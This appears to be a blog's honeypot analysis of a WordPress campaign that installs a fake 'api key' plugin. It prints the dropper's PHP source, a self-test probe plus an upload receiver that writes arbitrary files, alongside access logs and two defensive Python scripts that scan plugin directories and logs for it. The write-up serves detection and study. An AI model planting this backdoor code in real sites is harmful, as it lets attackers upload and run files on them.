Download of a small PHP file that can (a) check access, (b) download files to the compromised WordPress host.
Update 2019-05-28: Honey pot caught a small campaign to install apikey.php again.
I have modified my honey pot to recognize URLs ending in "apikey.php", so it answered when the attacker made a "hello" query of my honey pot.
Update 2019-10-05: Honey pot caught another campaign of an updated version of apikey.php, with more features.
222.214.69.105 → 105.69.214.222.broad.ga.sc.dynamic.163data.com.cn
105.69.214.222.broad.ga.sc.dynamic.163data.com.cn does not have an A record in DNS
whois says it's owned by a Chinese telecom company:
inetnum: 222.208.0.0 - 222.215.255.255
netname: CHINANET-SC
descr: CHINANET Sichuan province network
descr: China Telecom
descr: A12,Xin-Jie-Kou-Wai Street
descr: Beijing 100088
Downloaded to my WordPress honey pot via a plugin update: /wp-admin/update.php?action=upload-plugin
The PHP file apikey.php has this annotation:
/**
* @package api key
*/
/*
Plugin Name: api key
*/
Is the "api key" name meant to be innocuous? A quick Google search on "api key wordpress" gives many, many results.
The same IP address immediately accessed the file it had just downloaded to the host:
222.214.69.105 - - [01/Feb/2018:16:44:25 -0700] "GET /wp-content/plugins/apikey/apikey.php?test=hello HTTP/1.1" 200 120 "http://stratigery.com/wp-content/plugins/apikey/apikey.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3198.0 Safari/537.36 OPR/49.0.2711.0"
The GET parameters passed in match the code:
<?php
// Action 1: a "?test=hello" probe makes the file answer "testtrue",
// confirming it was extracted into place and that PHP executes it.
if ("hello"==$_GET["test"])
{
    echo "testtrue";
}
// Action 2: any multipart upload sent in the "filename" field is moved
// into place under whatever file name the request itself supplied.
if(is_uploaded_file($_FILES["filename"]["tmp_name"]))
{
    move_uploaded_file($_FILES["filename"]["tmp_name"],$_FILES["filename"]["name"]);
    echo "true";
}
The "test=hello" parameter matches one of the two actions in the code. The access of apikey.php seems like a validation test - did apikey.php get extracted correctly, and does it execute?
The second action in apikey.php is just a file upload receiver. If the expected keys in the $_FILES PHP superglobal are set, a file arrived with the request, so apikey.php moves it into place under the name the request supplied.
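A defender-side check for this kind of dropper, as an added example (not code from this write-up, the honey pot, or the plugin): a small Python scanner that walks a WordPress plugins directory and flags PHP files whose move_uploaded_file() destination is read straight out of $_FILES, and files that answer a literal-string probe on a $_GET parameter the way apikey.php does. The two plugin files it scans are constructed stand-ins (one mirroring the fragment above, one benign), and the temporary-directory layout and the "demo-uploader" name are assumptions for the demonstration.

```python
"""Scan a WordPress plugins directory for apikey.php-style droppers.

Added example for this write-up, not the plugin's or the site's own code.
Heuristics (assumptions about what "looks like" the dropper):
  * move_uploaded_file() whose source and destination are both read from
    $_FILES, i.e. the file is written under whatever name the request sent;
  * an equality test between a string literal and a $_GET parameter, the
    "hello" self-test seen in the log line above.
"""
import os
import re
import tempfile

# move_uploaded_file($_FILES[X]["tmp_name"], $_FILES[X]["name"]) in any spacing
DROPPER_RE = re.compile(
    r'move_uploaded_file\s*\(\s*\$_FILES\s*\[[^\]]+\]\s*\[\s*["\']tmp_name["\']\s*\]\s*,'
    r'\s*\$_FILES\s*\[[^\]]+\]\s*\[\s*["\']name["\']\s*\]\s*\)',
    re.IGNORECASE,
)
# "literal" == $_GET[...]  or  $_GET[...] == "literal"  (exactly two '=')
PROBE_RE = re.compile(
    r'(?:["\'][^"\']+["\']\s*==(?!=)\s*\$_GET\s*\[|\$_GET\s*\[[^\]]+\]\s*==(?!=)\s*["\'][^"\']+["\'])',
    re.IGNORECASE,
)

# Constructed stand-in mirroring the apikey.php fragment quoted above.
MALICIOUS_PLUGIN = '''<?php
/*
Plugin Name: api key
*/
if ("hello"==$_GET["test"])
{
echo "testtrue";
}
if(is_uploaded_file($_FILES["filename"]["tmp_name"]))
{
move_uploaded_file($_FILES["filename"]["tmp_name"],$_FILES["filename"]["name"]);
echo "true";
}
'''

# Constructed benign plugin: goes through WordPress' own upload handler
# behind a capability check, so neither heuristic fires.
BENIGN_PLUGIN = '''<?php
/*
Plugin Name: Demo Uploader (constructed)
*/
function demo_handle_upload() {
    if ( ! current_user_can( 'upload_files' ) ) {
        return;
    }
    $file = wp_handle_upload( $_FILES['demo_file'], array( 'test_form' => false ) );
}
'''


def scan_php_source(source: str) -> dict:
    """Apply both heuristics to one file's text."""
    return {
        "dropper": DROPPER_RE.search(source) is not None,
        "probe": PROBE_RE.search(source) is not None,
    }


def scan_plugins_dir(root: str) -> list:
    """Walk `root`; return [(relative posix path, result)] for files hitting either heuristic."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                result = scan_php_source(fh.read())
            if result["dropper"] or result["probe"]:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                hits.append((rel, result))
    return sorted(hits)


def build_sample_tree() -> str:
    """Create a temp plugins directory holding the two constructed files; return its path."""
    root = tempfile.mkdtemp(prefix="wp-plugins-")
    for slug, fname, body in (
        ("apikey", "apikey.php", MALICIOUS_PLUGIN),
        ("demo-uploader", "demo-uploader.php", BENIGN_PLUGIN),
    ):
        os.makedirs(os.path.join(root, slug), exist_ok=True)
        with open(os.path.join(root, slug, fname), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for rel, result in scan_plugins_dir(build_sample_tree()):
        print(rel, result)
```

Run against a real /wp-content/plugins tree, the script only narrows the list of files to read by hand; the two regexes are heuristics, and a legitimate plugin that compares a $_GET value with `==` will also show up under "probe", which is why the result keeps the two signals separate rather than collapsing them into one verdict.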
Shortly after this attack took place, a number of other IP addresses tried to access the apikey.php URL in "test" mode. It's possible these attackers believe they used the download feature of apikey.php, but I didn't update my honey pot to keep track of any files apikey.php might download until much later.
Timestamp | Source IP Address | URI |
---|---|---|
2018-02-01 16:44:25-07 | 222.214.69.105 | /wp-content/plugins/apikey/apikey.php?test=hello |
2018-02-09 02:20:33-07 | 18.219.100.147 | /wp-content/plugins/apikey/apikey.php?test=hello |
2018-02-09 02:36:39-07 | 18.219.100.147 | /wp-content/plugins/apikey/apikey.php?test=hello |
2018-02-09 23:37:47-07 | 188.162.37.43 | /wp-content/plugins/apikey/apikey.php |
2018-02-23 04:47:33-07 | 185.217.69.157 | /wp-content/plugins/apikey/apikey.php?test=hello |
2018-02-25 22:56:46-07 | 31.192.111.175 | /wp-content/plugins/apikey/apikey.php?test=hello |
2018-03-08 08:37:40-07 | 66.249.73.193 | /wp-content/plugins/apikey/apikey.php |
2018-05-04 07:07:14-06 | 185.25.50.150 | /wp-content/plugins/apikey/apikey.php?test=hello |
2018-05-19 16:18:29-06 | 194.187.251.155 | /wp-content/plugins/apikey/apikey.php?test=hello |
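The access pattern in the table, as an added example that is not part of the original post: a Python routine that parses Apache combined-format lines like the one quoted above, flags a plugin-file request whose query string is test=hello, and separately flags a plugin .php fetched by the same source address within a few minutes of a POST to /wp-admin/update.php?action=upload-plugin (the upload path named earlier). The log lines are constructed and use RFC 5737 documentation addresses rather than the addresses in the table; the ten-minute window is an assumption.

```python
"""Correlate web-server log lines with the apikey.php pattern.

Added example for this write-up, not the honey pot's own code. Two signals:
  1. a request for a plugin .php whose query string carries test=hello, the
     self-test that apikey.php answers with "testtrue";
  2. a plugin .php fetched by the same source address within WINDOW of a
     POST to /wp-admin/update.php?action=upload-plugin, the upload path the
     write-up names. WINDOW is an assumption.
"""
import re
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)
REASON_PROBE = "query string test=hello (apikey.php self-test)"
REASON_FOLLOWUP = "plugin file fetched by the uploading IP within the upload window"
UPLOAD_PATH = "/wp-admin/update.php?action=upload-plugin"

# Apache "combined" format, as in the honey pot line quoted above.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
PLUGIN_PHP_RE = re.compile(r'^/wp-content/plugins/([^/]+)/([^/?]+\.php)(?:\?(.*))?$')

# Constructed sample log; documentation addresses, not the IPs from the table.
SAMPLE_LOG = [
    '203.0.113.10 - - [01/Feb/2018:16:44:20 -0700] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 3120 "http://example.test/wp-admin/plugin-install.php" "Mozilla/5.0"',
    '203.0.113.10 - - [01/Feb/2018:16:44:25 -0700] "GET /wp-content/plugins/apikey/apikey.php?test=hello HTTP/1.1" 200 120 "http://example.test/wp-content/plugins/apikey/apikey.php" "Mozilla/5.0"',
    '192.0.2.9 - - [01/Feb/2018:16:45:00 -0700] "GET /wp-content/plugins/akismet/akismet.php HTTP/1.1" 200 120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [09/Feb/2018:02:20:33 -0700] "GET /wp-content/plugins/apikey/apikey.php?test=hello HTTP/1.1" 200 120 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [08/Mar/2018:08:37:40 -0700] "GET /wp-content/plugins/apikey/apikey.php HTTP/1.1" 200 120 "-" "Mozilla/5.0"',
    'garbage line that does not parse',
]


def parse_line(line: str):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def find_dropper_activity(lines, window: timedelta = WINDOW) -> list:
    """Return findings in log order: plugin, file, IP and the reasons each request was flagged."""
    events = [rec for rec in map(parse_line, lines) if rec is not None]
    uploads = [e for e in events if e["method"] == "POST" and e["path"].startswith(UPLOAD_PATH)]
    findings = []
    for e in events:
        m = PLUGIN_PHP_RE.match(e["path"])
        if m is None:
            continue
        slug, fname, query = m.groups()
        reasons = []
        if "test=hello" in (query or "").split("&"):
            reasons.append(REASON_PROBE)
        if any(u["ip"] == e["ip"] and timedelta(0) <= e["ts"] - u["ts"] <= window for u in uploads):
            reasons.append(REASON_FOLLOWUP)
        if reasons:
            findings.append({"ts": e["ts"].isoformat(), "ip": e["ip"],
                             "plugin": slug, "file": fname, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_dropper_activity(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["plugin"] + "/" + f["file"], "; ".join(f["reasons"]))
```

The sample deliberately includes a bare GET of apikey.php with no query string, like the third and sixth rows of the table: nothing in that line alone distinguishes it from a crawler touching an ordinary plugin file, so the routine does not flag it. Once a file has been identified as a dropper by other means (the plugins-directory scan, or the upload-then-probe pair), every request to its path can be pulled from the log directly.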